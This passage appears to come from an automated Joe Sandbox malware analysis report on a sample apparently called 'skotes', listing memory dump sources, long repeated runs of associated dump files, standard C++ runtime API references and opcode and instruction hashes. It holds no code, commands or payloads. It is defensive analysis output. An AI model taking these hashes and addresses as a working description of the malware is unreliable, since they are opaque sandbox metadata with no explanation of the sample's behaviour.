                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1924466884-0
                                                                                                                                                                                                                                                  • Opcode ID: 5a784029a21fb56d5a944306a32c4db744bbe9fa9fe812946f8d2ea26ca896a5
                                                                                                                                                                                                                                                  • Instruction ID: d8c47d68e4727ebf9ba630c86f625ad2f9fa071cb069ec333c988791a2934a83
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a784029a21fb56d5a944306a32c4db744bbe9fa9fe812946f8d2ea26ca896a5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE414B35A00204EFCF04EFA5C494AADBBB5FF48314F1880BADD499B382DB34A941CB95
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __Mtx_unlock.LIBCPMT ref: 00486ED1
                                                                                                                                                                                                                                                  • std::_Rethrow_future_exception.LIBCPMT ref: 00486F22
                                                                                                                                                                                                                                                  • std::_Rethrow_future_exception.LIBCPMT ref: 00486F32
                                                                                                                                                                                                                                                  • __Mtx_unlock.LIBCPMT ref: 00486FD5
                                                                                                                                                                                                                                                  • __Mtx_unlock.LIBCPMT ref: 004870DB
                                                                                                                                                                                                                                                  • __Mtx_unlock.LIBCPMT ref: 00487116
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1997747980-0
                                                                                                                                                                                                                                                  • Opcode ID: 13254ca951b98e4a78a27433025fc04e7375f834035b31c9f5e435fba2ccb39e
                                                                                                                                                                                                                                                  • Instruction ID: 177a5e53873fefca6cbe5e018e2fc9bebf61e29feee2675b77892684df289fa0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13254ca951b98e4a78a27433025fc04e7375f834035b31c9f5e435fba2ccb39e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47C1E0709042049FDB21EFA5C845BAFBBF4AF05304F10496FE91697781EB39E944CBA5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 00494538
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 0049456C
                                                                                                                                                                                                                                                  • Hash.LIBCMT ref: 004945D5
                                                                                                                                                                                                                                                  • Hash.LIBCMT ref: 004945E5
                                                                                                                                                                                                                                                    • Part of subcall function 00499C41: std::bad_exception::bad_exception.LIBCMT ref: 00499C63
                                                                                                                                                                                                                                                  • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0049474B
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004947A4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3010677857-0
                                                                                                                                                                                                                                                  • Opcode ID: ced3ebde5ae3fa91e727b2998bd85954fde99f1d05d5b11a0c6e5a96481d2d8a
                                                                                                                                                                                                                                                  • Instruction ID: 9fafba4fcbdd9938afa41c8bacb23075069144f2c96e736b3c1f3992fa8ac62f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ced3ebde5ae3fa91e727b2998bd85954fde99f1d05d5b11a0c6e5a96481d2d8a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E8173B0A11A12BAD708EF75C445BD9FBA8BF49704F10432FF42897281DBB8A554CBD5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 0048ECED
                                                                                                                                                                                                                                                  • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0048ED17
                                                                                                                                                                                                                                                    • Part of subcall function 0048F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0048F3FA
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0048ED53
                                                                                                                                                                                                                                                  • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0048ED94
                                                                                                                                                                                                                                                  • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0048EDC6
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0048EDEC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
